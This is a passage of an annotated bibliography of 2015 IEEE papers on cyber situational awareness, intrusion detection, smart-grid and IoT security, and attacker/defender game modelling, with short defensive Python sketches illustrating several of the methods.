Abstract: Homeland safety and security will increasingly depend upon autonomous unmanned vehicles as a method of assessing and maintaining situational awareness. As autonomous team algorithms evolve toward requiring less human intervention, it may be that having an “operator-in-the-loop” becomes the ultimate goal in utilizing autonomous teams for surveillance. However, studies have shown that trust plays a factor in how effectively an operator can work with autonomous teammates. In this work, we study mechanisms that look at autonomy as a system and not as the sum of individual actions. First, we conjecture that if the operator understands how the team autonomy is designed, they will better trust that the system will contribute to the overall goal. Second, we focus on algorithm input criteria as being linked to operator perception and trust. We focus on adding a time-varying spatial projection of areas in the ROI that have been unseen for more than a set duration (STEC). Studies utilize a custom test bed that allows users to interact with a surveillance team to find a target in the region of interest. Results show that while algorithm training had an adverse effect, projecting salient team/surveillance state had a statistically significant impact on trust and did not negatively affect workload or performance. This result may point to a mechanism for improving trust through visualizing states as used in the autonomous algorithm.

keywords: autonomous aerial vehicles;mobile robots;multi-robot systems;national security;surveillance;ROI;adverse effect;autonomous team algorithms;autonomous teammates;autonomous unmanned vehicles;homeland safety;homeland security;intelligent multirobot surveillance system;operator in the loop;operator perception;operator trust;region of interest;salient team projection;situational awareness;state visualization;surveillance state projection;team autonomy;time-varying spatial projection;Automation;Robots;Standards;Streaming media;Surveillance;Training;User interfaces (ID#: 16-9285)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7139654&isnumber=7138973

 

Balfour, R.E., "Building the “Internet of Everything” (IoE) for first responders," in Systems, Applications and Technology Conference (LISAT), 2015 IEEE Long Island, pp. 1-6, 1-1 May 2015. doi: 10.1109/LISAT.2015.7160172

Abstract: The “Internet of Everything” (IoE) describes the “bringing together of people, process, data, and things to make networked connections more relevant and valuable than ever before”. IoE encompasses both machine-to-machine (M2M) and Internet-of-Things (IoT) technologies, and it is the pervasiveness of IoE that can be leveraged to achieve many things for many people, including first responders. The emerging IoE will continue to evolve over the next ten years and beyond, but the IoT can happen now, with automated M2M communications bringing first responder communications and situational awareness to the leading-edge of IoE-leveraged technology - exactly where they belong as they risk their lives to protect and save others. Presented here are a number of technological capabilities that are critical to achieving the IoE, especially for first responders and emergency managers, including (a) Security; (b) a global M2M standard; (c) powerful four-dimensional M2M applications; and (d) Data Privacy and trust. For advanced security, Software Defined Network Perimeters (SDP) can provide the critical functionality to protect and secure M2M nodes in an ad-hoc M2M IoT/IoE network. Without a secure, dynamic M2M network, the vision of an emergency responder instantly communicating with a “smart building” would not be feasible. But with SDP, it can, and will, happen. SDP enables an ad-hoc, secure M2M network to rapidly deploy and “hide in plain sight”. In an emergency response situation, this is exactly what we need. For M2M/IoT to go mobile and leverage global IoE capabilities anywhere (which is what emergency responders need, as emergency locations are somewhat unpredictable and change every day), a global industry standard must be, and is being, developed: oneM2M. And the existing fourDscape® technology/platform could quickly support a oneM2M system structure that can be deployed in the short term, with the fourDscape browser providing powerful M2M IoT/IoE applications and 4D visualizations. Privacy-by-design principles can also be applied, and other critical related issues addressed beyond privacy (i.e. once privacy is achieved and available IoE sensors/data can be leveraged), such as trusting, scaling, hacking, and securing M2M IoT/IoE devices and systems. Without a full package of IoE innovation that embraces the very public IoE world in a very private and secure way, and that continues to evolve in parallel with emerging commercial IoE technology, first responders would not be able to leverage the commercial state-of-the-art in the short term and in the years to come. Current technology innovation can change that.

keywords: Internet of Things;computer crime;data privacy;data visualisation;innovation management;software defined networking;trusted computing;4D visualizations;Internet of Everything;Internet-of-Things technologies;IoE pervasiveness;IoT technologies;M2M network security;SDP;ad-hoc M2M IoT/IoE network;ad-hoc network;automated M2M communications;data privacy;emergency responder;emergency response situation;four-dimensional M2M applications;fourDscape browser;global IoE capabilities;global M2M standard;global industry standard;hacking;machine-to-machine;oneM2M system structure;privacy-by-design principles;responder communications;situational awareness;smart building;software defined network perimeters;technology innovation;trust;Ad hoc networks;Buildings;Computer architecture;Mobile communication;Security;Tablet computers;Internet-of-Everything;Internet-of-Things;IoE;IoT;M2M;Machine-to-Machine;PbD;Privacy-by-Design;SDP;Software Defined Network Perimeters;fourDscape (ID#: 16-9286)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160172&isnumber=7160171

 

Dwivedi, N.; Tripathi, A., "Event Correlation for Intrusion Detection Systems," in Computational Intelligence & Communication Technology (CICT), 2015 IEEE International Conference on, pp. 133-139, 13-14 Feb. 2015. doi: 10.1109/CICT.2015.111

Abstract: Intrusion Detection Systems (IDSs) have grown into a mature and feature-rich technology that provides advanced features to detect intrusions and provide responses. It also allows the management system to perform security analysis by monitoring, configuring, and analyzing the intrusion data. A better understanding of alerts, achieved by using a general framework and infrastructure for detecting intrusions through an event correlation strategy, minimizes the amount of data generated. Event correlation techniques are needed for two reasons. First, network attack detection is usually based on information or data received from distributed sensors, e.g. intrusion detection systems. During attacks, the generated amount of events is hard to handle, and so it is difficult to evaluate the current attack situation for a larger network. Thus, the concept of event or alert correlation has been introduced. Event correlation paints a picture of what is now being called network or cyber situational awareness, and tries to guide the security administrator on the actions that he can take to mitigate the crisis. The aim of event correlation for an intrusion detection system (IDS) is to improve security by correlating events and reduce the workload on an IDS analyst. This correlation has been achieved by grouping similar alerts, thus allowing the analyst to only look at a few alerts instead of hundreds or thousands. In this paper, we correlate the results of the SNORT Intrusion Detection System (IDS) with SEC (Simple Event Correlator) by taking the input from the MIT DARPA (Defense Advanced Research Projects Agency) dataset. The number of alerts generated by Snort is very large, so it is difficult for administrators to review them. Here we correlate alerts that have the same name but come from different IP addresses. This correlation removes the duplication of alerts and thus reduces the information overload on the administrator.

keywords: IP networks;computer network security;correlation methods;Defense advanced Research Projects Agency;IDS;IP address;MIT DARPA dataset;SEC;SNORT intrusion detection system;alert correlation;cyber situational awareness;distributed sensors;event correlation strategy;management system;network attack detection;security administrator;security analysis;simple event correlator;workload reduction;Computers;Correlation;Feature extraction;Intrusion detection;Monitoring;Sensors;Correlation;DARPA;IDS;SEC;events (ID#: 16-9287)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7078682&isnumber=7078645
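
The aggregation the authors perform with SEC can be illustrated with a minimal stand-in: collapse Snort-style alerts that share a signature name but arrive from different IP addresses into one correlated event. The alert records below are invented and heavily simplified; real SEC rules operate on Snort's log lines.

```python
# Collapse Snort-style alerts sharing a signature name into one correlated
# event, tracking the distinct source IPs. Simplified, invented records.
from collections import defaultdict

alerts = [
    {"sig": "ICMP PING NMAP", "src": "10.0.0.5"},
    {"sig": "ICMP PING NMAP", "src": "10.0.0.9"},
    {"sig": "WEB-IIS cmd.exe access", "src": "172.16.1.2"},
    {"sig": "ICMP PING NMAP", "src": "10.0.0.5"},
]

correlated = defaultdict(set)
for a in alerts:
    correlated[a["sig"]].add(a["src"])   # one entry per signature name

for sig, sources in correlated.items():
    print(f"{sig}: {len(sources)} distinct source(s) -> {sorted(sources)}")
# The analyst now reviews 2 correlated events instead of 4 raw alerts.
```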

 

Leszczyna, R.; Wrobel, M.R., "Evaluation of open source SIEM for situation awareness platform in the smart grid environment," in Factory Communication Systems (WFCS), 2015 IEEE World Conference on, pp. 1-4, 27-29 May 2015. doi: 10.1109/WFCS.2015.7160577

Abstract: The smart grid, as a large-scale system of systems, has an exceptionally large surface exposed to cyber-attacks, including highly evolved and sophisticated threats such as Advanced Persistent Threats (APTs) or botnets. When addressing this situation, the usual cyber security technologies are a prerequisite, but not sufficient. The smart grid requires developing and deploying an extensive ICT infrastructure that supports significantly increased situational awareness and enables detailed and precise command and control. The paper presents one of the studies related to the development and deployment of the Situation Awareness Platform for the smart grid, namely the evaluation of open source Security Information and Event Management systems. These systems are the key components of the platform.

keywords: Internet;computer network security;grid computing;public domain software;APT;ICT infrastructure;advanced persistent threats;botnets;command-and-control;cyber-attacks;open source SIEM evaluation;open source security information-and-event management systems;situation awareness platform;smart grid environment;Computer security;NIST;Sensor systems;Smart grids;Software;SIEM;evaluation;situation awareness;smart grid (ID#: 16-9288)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7160577&isnumber=7160536

 

Sixiao Wei; Dan Shen; Genshe Chen; Hanlin Zhang; Wei Yu; Blasch, E.; Pham, K.; Cruz, J.B., "On effectiveness of game theoretic modeling and analysis against cyber threats for avionic systems," in Digital Avionics Systems Conference (DASC), 2015 IEEE/AIAA 34th, pp. 4B2-1-4B2-13, 13-17 Sept. 2015. doi: 10.1109/DASC.2015.7311417

Abstract: Cyber-attack defense requires network security situation awareness through distributed collaborative monitoring, detection, and mitigation. Developing and demonstrating innovative and effective situational awareness techniques for avionics has increased in importance over the last decade. In this paper, we first conducted game-theoretic modeling and analysis to study the interaction between an adversary and a defender. We then introduced the implementation of game-theoretic analysis on an Avionics Sensor-based Defense System (ASDS), which consists of distributed passive and active network sensors. A trade-off between defense and attack strategies was studied via an existing tool for game theory (Gambit). To further enhance the defense and mitigate attacks, we designed and implemented a multi-functional web display to integrate the game-theoretic analysis. Our simulation validates that game-theoretic modeling and analysis can help the Avionics Sensor-based Defense System (ASDS) adapt detection and response strategies to efficiently and dynamically deal with various cyber threats.

keywords: aerospace computing;avionics;distributed sensors;game theory;security of data;ASDS;Gambit;active network sensors;avionic systems;avionics sensor-based defense system;cyber threats;cyber-attack defense;distributed collaborative detection;distributed collaborative mitigation;distributed collaborative monitoring;distributed passive network sensors;game theoretic modeling;multifunctional Web display;network security situation awareness techniques;Monitoring (ID#: 16-9289)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7311417&isnumber=7311321
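
A toy version of the attacker/defender analysis, with invented payoffs: a 2x2 zero-sum matrix of defender losses checked for a pure-strategy saddle point. When, as here, none exists, the equilibrium lies in mixed strategies, which the paper computes with tools such as Gambit.

```python
# 2x2 zero-sum attacker/defender game with invented payoffs: check for a
# pure-strategy saddle point by comparing the two players' security levels.
import numpy as np

# Rows: defender {patch, monitor}; columns: attacker {exploit, probe}.
# Entries are the defender's losses.
loss = np.array([[2.0, 4.0],
                 [5.0, 1.0]])

defender_ceiling = loss.max(axis=1).min()  # best worst-case loss for defender
attacker_floor = loss.min(axis=0).max()    # best guaranteed loss for attacker

print(defender_ceiling, attacker_floor)    # 4.0 vs 2.0: no saddle point, so
# the equilibrium is in mixed strategies (solvable with LP or Gambit).
```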

 

Glowacka, J.; Krygier, J.; Amanowicz, M., "A trust-based situation awareness system for military applications of the internet of things," in Internet of Things (WF-IoT), 2015 IEEE 2nd World Forum on, pp. 490-495, 14-16 Dec. 2015. doi: 10.1109/WF-IoT.2015.7389103

Abstract: Integration of heterogeneous objects diverse in technology, environmental constraints and level of trust is a challenging issue. The paper presents a novel trust-based cognitive mechanism that enables the objects of an IoT infrastructure to build their situational awareness and use this knowledge to react appropriately to detected threats. We demonstrate, by simulation, the efficiency of the proposed solution and its robustness to attacks on the reputation system.

keywords: Internet of Things;military communication;telecommunication security;Internet of Things;IoT infrastructure;environmental constraints;heterogeneous object integration;military applications;reputation system;trust-based cognitive mechanism;trust-based situation awareness system;Cryptography;Electron tubes;Internet of things;Robustness;Routing protocols;Standards;Internet of Things;inference;reputation attack;reputation system;situation awareness;trust (ID#: 16-9290)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7389103&isnumber=7389012

 

Torres, G.; Smith, K.; Buscemi, J.; Doshi, S.; Ha Duong; Defeng Xu; Pickett, H.K., "Distributed StealthNet (D-SN): Creating a live, virtual, constructive (LVC) environment for simulating cyber-attacks for test and evaluation (T&E)," in Military Communications Conference, MILCOM 2015 - 2015 IEEE, pp. 1284-1291, 26-28 Oct. 2015. doi: 10.1109/MILCOM.2015.7357622

Abstract: The Services have become increasingly dependent on their tactical networks for mission command functions, situational awareness, and target engagements (terminal weapon guidance). While the network brings an unprecedented ability to project force by all echelons in a mission context, it also brings the increased risk of cyber-attack on the mission operation. With both this network use and vulnerability in mind, it is necessary to test new systems (and networked Systems of Systems (SoS)) in a cyber-vulnerable network context. A new test technology, Distributed-StealthNet (D-SN), has been created by the Department of Defense Test Resource Management Center (TRMC) to support SoS testing with cyber-attacks against mission threads. D-SN is a simulation/emulation based virtual environment that can provide a representation of a full scale tactical network deployment (both Radio Frequency (RF) segments and wired networks at command posts). D-SN has models of real world cyber threats that affect live tactical systems and networks. D-SN can be integrated with live mission Command and Control (C2) hardware and then a series of cyber-attacks using these threat models can be launched against the virtual network and the live hardware to determine the SoS's resiliency to sustain the tactical mission. This paper describes this new capability and the new technologies developed to support this capability.

keywords: command and control systems;computer network security;military communication;wide area networks;C2 hardware;Command and Control hardware;D-SN;LVC environment;T&E;TRMC;cyberattack simulation;cybervulnerable network context;department of defense test resource management center;distributed stealthnet;live,virtual, constructive environment;tactical network;test and evaluation;Computational modeling;Computer architecture;Computers;Hardware;Ports (Computers);Real-time systems;Wide area networks (ID#: 16-9291)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7357622&isnumber=7357245

 

Aggarwal, P.; Grover, A.; Singh, S.; Maqbool, Z.; Pammi, V.S.C.; Dutt, V., "Cyber security: A game-theoretic analysis of defender and attacker strategies in defacing-website games," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-8, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166127

Abstract: The rate at which cyber-attacks are increasing globally paints a troubling picture. The main dynamics of such attacks can be studied in terms of the actions of attackers and defenders in a cyber-security game; however, little research has so far studied such interactions. In this paper we use behavioral game theory to investigate the role of certain actions taken by attackers and defenders in a simulated cyber-attack scenario of defacing a website. We choose a Reinforcement Learning (RL) model to represent a simulated attacker and a defender in a 2×4 cyber-security game where each of the 2 players could take up to 4 actions. Pairs of model participants were computationally simulated across 1000 simulations, where each pair played at most 30 rounds in the game. The goal of the attacker was to deface the website and the goal of the defender was to prevent the attacker from doing so. Our results show that the actions taken by both attackers and defenders are a function of the attention these roles pay to their recently obtained outcomes. It was observed that if the attacker pays more attention to recent outcomes, the attacker is more likely to perform attack actions. We discuss the implications of our results for the evolution of dynamics between attackers and defenders in cyber-security games.

keywords: Web sites;computer crime;computer games;game theory;learning (artificial intelligence);RL model;attacker strategies;attacks dynamics;behavioral game theory;cyber-attacks;cyber-security game;defacing Website games;defender strategies;game-theoretic analysis;reinforcement learning;Cognitive science;Computational modeling;Computer security;Cost function;Games;Probabilistic logic;attacker;cognitive modeling;cyber security;cyber-attacks;defender;reinforcement-learning model (ID#: 16-9292)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166127&isnumber=7166109
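
A minimal recency-weighted reinforcement-learning simulation of such a repeated attacker/defender game can be sketched as follows; the payoff values, softmax temperature, and attention (recency) parameters are hypothetical, not the authors' calibrated model.

import numpy as np

rng = np.random.default_rng(7)

# Hypothetical payoffs: entries are attacker gains; the defender
# receives the negative. Two attacker actions, four defender actions.
PAYOFF = rng.uniform(-1, 1, size=(2, 4))

def softmax(q, temperature=0.5):
    e = np.exp(q / temperature)
    return e / e.sum()

def simulate(rounds=30, attention_attacker=0.8, attention_defender=0.3):
    # attention is the recency weight: higher values mean the agent
    # leans more heavily on its most recent outcome.
    q_att, q_def = np.zeros(2), np.zeros(4)
    for _ in range(rounds):
        a = rng.choice(2, p=softmax(q_att))
        d = rng.choice(4, p=softmax(q_def))
        r = PAYOFF[a, d]
        q_att[a] += attention_attacker * (r - q_att[a])
        q_def[d] += attention_defender * (-r - q_def[d])
    return q_att, q_def

print(simulate())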

 

Neogy, S., "Security management in Wireless Sensor Networks," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-4, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166112

Abstract: This paper describes the characteristics of Wireless Sensor Networks (WSNs) and the challenges in designing a resource-constrained and vulnerable network, and addresses security management as the main issue. The work begins with a discussion of attacks on WSNs. As part of protection against these attacks, key management, the primary requirement of any security practice, is detailed. The paper also covers existing security schemes for various routing protocols and touches on security issues concerning heterogeneous networks.

keywords: routing protocols;telecommunication security;wireless sensor networks;WSN;heterogeneous networks;routing protocols;security management schemes;wireless sensor networks;Cryptography;Receivers;Routing;Routing protocols;Wireless sensor networks;attack;cryptography;key management;protocol;routing;security;wireless sensor network (ID#: 16-9293)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166112&isnumber=7166109

 

Pietrowicz, S.; Falchuk, B.; Kolarov, A.; Naidu, A., "Web-Based Smart Grid Network Analytics Framework," in Information Reuse and Integration (IRI), 2015 IEEE International Conference on, pp. 496-501, 13-15 Aug. 2015. doi: 10.1109/IRI.2015.82

Abstract: As utilities across the globe continue to deploy Smart Grid technology, there is an immediate and growing need for analytics, diagnostics and forensics tools akin to those commonly employed in enterprise IP networks to provide visibility and situational awareness into the operation, security and performance of Smart Energy Networks. Large-scale Smart Grid deployments have raced ahead of mature management tools, leaving gaps and challenges for operators and asset owners. Proprietary Smart Grid solutions have added to the challenge. This paper reports on the research and development of a new vendor-neutral, packet-based, network analytics tool called MeshView that abstracts information about system operation from low-level packet detail and visualizes endpoint and network behavior of wireless Advanced Metering Infrastructure, Distribution Automation, and SCADA field networks. Using real utility use cases, we report on the challenges and resulting solutions in the software design, development and Web usability of the framework, which is currently in use by several utilities.

keywords: Internet;power engineering computing;smart power grids;software engineering;Internet protocols;MeshView tool;SCADA field network;Web usability;Web-based smart grid network analytics framework;distribution automation;enterprise IP networks;smart energy networks;smart grid technology;software design;software development;wireless advanced metering infrastructure;Conferences;Advanced Meter Infrastructure;Big data visualization;Cybersecurity;Field Area Networks;Network Analytics;Smart Energy;Smart Grid;System scalability;Web management (ID#: 16-9294)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7301018&isnumber=7300933

 

Puri, Colin; Dukatz, Carl, "Analyzing and Predicting Security Event Anomalies: Lessons Learned from a Large Enterprise Big Data Streaming Analytics Deployment," in Database and Expert Systems Applications (DEXA), 2015 26th International Workshop on, pp. 152-158, 1-4 Sept. 2015. doi: 10.1109/DEXA.2015.46

Abstract: This paper presents a novel and unique live operational and situational awareness implementation bringing big data architectures, graph analytics, streaming analytics, and interactive visualizations to a security use case with data from a large Global 500 company. We present the data acceleration patterns utilized, the employed analytics framework and its complexities, and finally demonstrate the creation of rich interactive visualizations that bring the story of the data acceleration pipeline and analytics to life. We deploy a novel solution to learn typical network agent behaviors and extract the degree to which a network event is anomalous for automatic anomaly rule learning to provide additional context to security alerts. We implement and evaluate the analytics over a data acceleration framework that performs the analysis and model creation at scale in a distributed parallel manner. Additionally, we talk about the acceleration architecture considerations and demonstrate how we complete the analytics story with rich interactive visualizations designed for the security and business analyst alike. This paper concludes with evaluations and lessons learned.

keywords: Conferences; Databases; Expert systems; D3 visualization; anomaly detection; batch analytics; data acceleration; graph analytics; log content analytics; streaming analytics (ID#: 16-9295)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7406285&isnumber=7406238
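
The anomaly-rule-learning idea described above — learn each network agent's typical behavior, then score how surprising a new event is — can be illustrated compactly. The event types, smoothing, and scoring below are a hypothetical sketch, not the authors' deployed pipeline.

from collections import defaultdict
import math

# Hypothetical event stream: (agent, event_type) pairs.
events = [("host-1", "login"), ("host-1", "login"), ("host-1", "scan"),
          ("host-2", "login"), ("host-2", "login"), ("host-2", "login")]

# Learn baseline behavior: event-type counts per agent.
counts = defaultdict(lambda: defaultdict(int))
for agent, etype in events:
    counts[agent][etype] += 1

def anomaly_degree(agent, etype):
    # Surprise of an event given the agent's learned profile, measured
    # as negative log-probability: rarer events score higher.
    total = sum(counts[agent].values())
    p = counts[agent].get(etype, 0.5) / (total + 1)  # light smoothing
    return -math.log(p)

print(anomaly_degree("host-2", "scan"))   # unseen for host-2 -> high score
print(anomaly_degree("host-1", "login"))  # common for host-1 -> low score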

 

Nasir, M.A.; Nefti-Meziani, S.; Sultan, S.; Manzoor, U., "Potential cyber-attacks against global oil supply chain," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-7, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166137

Abstract: The energy sector has been actively looking into cyber risk assessment at a global level, as risk has a ripple effect; risk taken at one step in the supply chain has an impact on all the other nodes. Cyber-attacks not only hinder functional operations in an organization but also damage its reputation and the confidence of shareholders, resulting in financial losses. Organizations that are open to the idea of protecting their assets and information flow, and are equipped to respond quickly to any cyber incident, are the ones that prevail longer in the global market. As a contribution we put forward a modular plan to mitigate or reduce cyber risks in the global supply chain by identifying potential cyber threats at each step along with their immediate countermeasures.

keywords: globalisation;organisational aspects;petroleum industry;risk management;security of data;supply chain management;cyber incident;cyber risk assessment;cyber-attack;damaging effect;energy sector;financial losses;global market;global oil supply chain;global supply chain;information flow;organization;ripple effect;Companies;Computer hacking;Information management;Supply chains;Temperature sensors;cyber-attacks;cyber-attacks countermeasures;oil supply chain;threats to energy sector (ID#: 16-9296)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166137&isnumber=7166109

 

Evangelopoulou, M.; Johnson, C.W., "Empirical framework for situation awareness measurement techniques in network defense," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-4, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166132

Abstract: This paper presents an empirical framework for implementing Situation Awareness Measurement Techniques in a Network Defense environment. Bearing in mind the rise of Cyber-crime and the importance of Cyber security, the role of the security analyst (or as this paper will refer to them, defenders) is critical. In this paper the role of Situation Awareness Measurement Techniques will be presented and explained briefly. Input from previous studies will be given and an empirical framework of how to measure Situation Awareness in a computing network environment will be offered in two main parts. The first one will include the networking infrastructure of the system. The second part will be focused on specifying which Situation Awareness Techniques are going to be used and which Situation Awareness critical questions need to be asked to improve future decision making in cyber-security. Finally, a discussion will take place concerning the proposed approach, the chosen methodology and further validation.

keywords: computer crime;computer network security;decision making;computing network environment;cyber-crime;cybersecurity;decision making;network defense environment;situation awareness measurement techniques;Computer security;Decision making;Human factors;Measurement techniques;Monitoring;Unsolicited electronic mail;Cyber Security;CyberSA;Decision Making;Intrusion Detection;Network Defense;Situation Awareness;Situation Awareness Measurement Techniques (ID#: 16-9297)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166132&isnumber=7166109

 

Bjerkestrand, T.; Tsaptsinos, D.; Pfluegel, E., "An evaluation of feature selection and reduction algorithms for network IDS data," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-2, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166129

Abstract: Intrusion detection is concerned with monitoring and analysing events occurring in a computer system in order to discover potential malicious activity. Data mining, which is part of the procedure of knowledge discovery in databases, is the process of analysing the collected data to find patterns or correlations. As the amount of data collected, stored, and processed only increases, so does the significance and importance of intrusion detection and data mining. A dataset that has been particularly exposed to research is the dataset used for the Third International Knowledge Discovery and Data Mining Tools competition, KDD99. The KDD99 dataset has been used to identify which data mining techniques relate to certain attacks, and has been employed to demonstrate that decision trees are more efficient than the Naïve Bayes model when it comes to detecting new attacks. When it comes to detecting network intrusions, the C4.5 algorithm performs better than SVM. The aim of our research is to evaluate and compare the usage of various feature selection and reduction algorithms against publicly available datasets. In this contribution, the focus is on feature selection and reduction algorithms. Three feature selection algorithms, each consisting of an attribute evaluator and a test method, have been used. Initial results indicate that the performance of the classifier is unaffected by reducing the number of attributes.

keywords: Bayes methods;data mining;decision trees;feature selection;security of data;C4.5 algorithm;KDD99 dataset;SVM;computer system;data mining technique;decision tree;feature selection;intrusion detection;naive Bayes model;network IDS data;network intrusion;potential malicious activity;reduction algorithm;third international knowledge discovery and data mining tools competition;Algorithm design and analysis;Classification algorithms;Data mining;Databases;Intrusion detection;Knowledge discovery;Training;KDD dataset;data mining;feature selection and reduction;intrusion detection;knowledge discovery (ID#: 16-9298)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166129&isnumber=7166109
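
The experimental pattern — pair an attribute evaluator with a test method, reduce the feature set, and check that classifier performance holds — can be sketched with scikit-learn. The evaluator (mutual information) and the synthetic KDD99-style data below are stand-ins; the paper does not specify these exact choices.

from sklearn.datasets import make_classification
from sklearn.feature_selection import SelectKBest, mutual_info_classif
from sklearn.metrics import accuracy_score
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier

# Synthetic stand-in for KDD99-style records: 41 features, binary label.
X, y = make_classification(n_samples=2000, n_features=41, n_informative=8, random_state=0)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, random_state=0)

for k in (41, 20, 10):  # full feature set, then two reduced sets
    selector = SelectKBest(mutual_info_classif, k=k).fit(X_tr, y_tr)
    clf = DecisionTreeClassifier(random_state=0).fit(selector.transform(X_tr), y_tr)
    acc = accuracy_score(y_te, clf.predict(selector.transform(X_te)))
    print(f"{k:>2} features: accuracy {acc:.3f}")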

 

Adenusi, D.; Kuboye, B.M.; Alese, B.K.; Thompson, A.F.-B., "Development of cyber situation awareness model," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-11, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166135

Abstract: This study designed and simulated a cyber situation awareness model for gaining experience of the cyberspace condition, with a view to timely detection of anomalous activities and taking proactive decisions to safeguard the cyberspace. The situation awareness model was modelled using Artificial Intelligence (AI) techniques. The cyber situation perception sub-model of the situation awareness model was modelled using Artificial Neural Networks (ANN), while the comprehension and projection sub-models were modelled using Rule-Based Reasoning (RBR) techniques. The cyber situation perception sub-model was simulated in MATLAB 7.0 using the standard KDD'99 intrusion dataset and evaluated for threat detection accuracy using precision, recall and overall accuracy metrics. The simulation results for these performance metrics showed that the cyber situation perception sub-model performed better as the number of training data records increased. The cyber situation model designed was able to meet its overall goal of assisting network administrators in gaining experience of the cyberspace condition. The model was capable of sensing the cyberspace condition, performing analysis based on the sensed condition, and predicting the near-future condition of the cyberspace.

keywords: artificial intelligence;inference mechanisms;knowledge based systems;mathematics computing;neural nets;security of data;AI technique;ANN;Matlab 7.0;RBR techniques;anomalous activities detection;artificial intelligence;artificial neural networks;cyber situation awareness model;cyberspace condition;proactive decision safeguard;rule-based reasoning;training data records;Artificial neural networks;Computational modeling;Computer security;Cyberspace;Data models;Intrusion detection;Mathematical model;Artificial Intelligence;Awareness;cyber-situation;cybersecurity;cyberspace (ID#: 16-9299)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166135&isnumber=7166109

 

Bode, M.A.; Alese, B.K.; Oluwadare, S.A.; Thompson, A.F.-B., "Risk analysis in cyber situation awareness using Bayesian approach," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-12, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7166119

Abstract: Unpredictable cyber attackers and threats have to be detected in order to determine the outcome of risk in a network environment. This work develops a Bayesian network classifier to analyse the network traffic in a cyber situation. It is a tool that aids reasoning under uncertainty to determine certainty. It further analyzes the level of risk using a modified risk matrix criterion. The classifier developed was experimented with various records extracted from the KDD Cup'99 dataset of 490,021 records. The evaluations showed that the Bayesian network classifier is a suitable model: it achieved the same performance level as Association Rule Mining in classifying Denial of Service (DoS) attacks, and compared with a Genetic Algorithm it performed better in classifying probe and User to Root (U2R) attacks and classified DoS equally well. The result of the classification showed that the Bayesian network classifier is a classification model that thrives in network security. The level of risk analysed from the adapted risk matrix showed that the DoS attack has the most frequent occurrence and falls in the generally unacceptable risk zone.

keywords: Bayes methods;belief networks;computer network security;data mining;inference mechanisms;pattern classification;risk analysis;Bayesian approach;Bayesian network classifier;DoS attacks;KDD Cup 99 dataset;U2R attacks;association rule mining;classified DoS equally;cyber attackers;cyber situation;cyber situation awareness;cyber threats;denial of service attacks;genetic algorithm;modified risk matrix criteria;network environment;network security;network traffic analysis;risk analysis;user to root attacks;Bayes methods;Intrusion detection;Risk management;Telecommunication traffic;Uncertainty;Bayesian approach;Cyber Situation Awareness; KDD Cup'99; Risk matrix (ID#: 16-9300)

URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=7166119&isnumber=7166109
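
The two halves of this approach — a Bayesian classifier over traffic records, and a risk matrix that maps attack likelihood and impact to a risk zone — can be sketched as follows. GaussianNB stands in for the paper's full Bayesian network, and the matrix thresholds are hypothetical, not the authors' adapted criteria.

from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from sklearn.naive_bayes import GaussianNB

# Synthetic stand-in for KDD Cup'99 traffic; class 1 = attack (e.g., DoS).
X, y = make_classification(n_samples=3000, n_features=20, weights=[0.6, 0.4], random_state=1)
X_tr, X_te, y_tr, y_te = train_test_split(X, y, test_size=0.3, random_state=1)

clf = GaussianNB().fit(X_tr, y_tr)
attack_likelihood = clf.predict(X_te).mean()  # frequency of predicted attacks

def risk_zone(likelihood, impact):
    # Map a likelihood/impact pair onto a simple risk matrix
    # (thresholds are illustrative placeholders).
    score = likelihood * impact
    if score >= 0.6:
        return "generally unacceptable"
    if score >= 0.3:
        return "tolerable"
    return "acceptable"

print(f"attack likelihood {attack_likelihood:.2f} ->", risk_zone(attack_likelihood, impact=1.0))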

 

Stevanovic, M.; Pedersen, J.M., "An analysis of network traffic classification for botnet detection," in Cyber Situational Awareness, Data Analytics and Assessment (CyberSA), 2015 International Conference on, pp. 1-8, 8-9 June 2015. doi: 10.1109/CyberSA.2015.7361120

